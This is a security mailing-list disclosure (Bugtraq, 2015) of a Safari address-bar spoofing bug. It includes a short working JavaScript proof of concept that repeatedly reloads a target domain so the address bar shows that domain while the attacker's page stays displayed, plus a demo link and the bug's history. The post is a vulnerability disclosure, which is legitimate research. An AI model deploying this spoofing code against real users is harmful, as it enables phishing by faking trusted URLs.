Safari Address Spoofing - Impact, Code, How It Works, History

From: David Leo <david.leo@deusen.co.uk>
To: bugtraq@securityfocus.com
Cc:
Subject: Safari Address Spoofing - Impact, Code, How It Works, History
Date:


Impact:
"It works on fully patched versions of iOS and OS X"
Reference:
http://arstechnica.com/security/2015/05/safari-address-spoofing-bug-could-be-used-in-phishing-malware-attacks/

Code(JavaScript):
function f()
{
     location="http://www.dailymail.co.uk/home/index.html?random="+Math.random();
}
setInterval("f()",10);

It's online:
http://www.deusen.co.uk/items/iwhere.9500182225526788/

How It Works:
Just keep trying to load the web page of target domain.
Safari changes address bar to new URL,
BEFORE new content is loaded.

History

Michal Zalewski pointed out
the weakness is five years old(at least):
http://lcamtuf.blogspot.com/2010/06/yeah-about-that-address-bar-thing.html
"Safari...
always showing the new destination...
can be deceptive"

We pointed out
his Safari code does not work in real attack...
If you change "http://1.2.3.4/" in your Safari code:
some URL in the real world(for example, dailymail.co.uk).
Your code won't work(page of target domain is simply loaded).

Conclusion:
The weakness is very old.
Deusen's method to use this weakness is new.

Kind Regards,

__________
BestSec
http://www.deusen.co.uk/items/bestsec/
We like it. We read it.





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.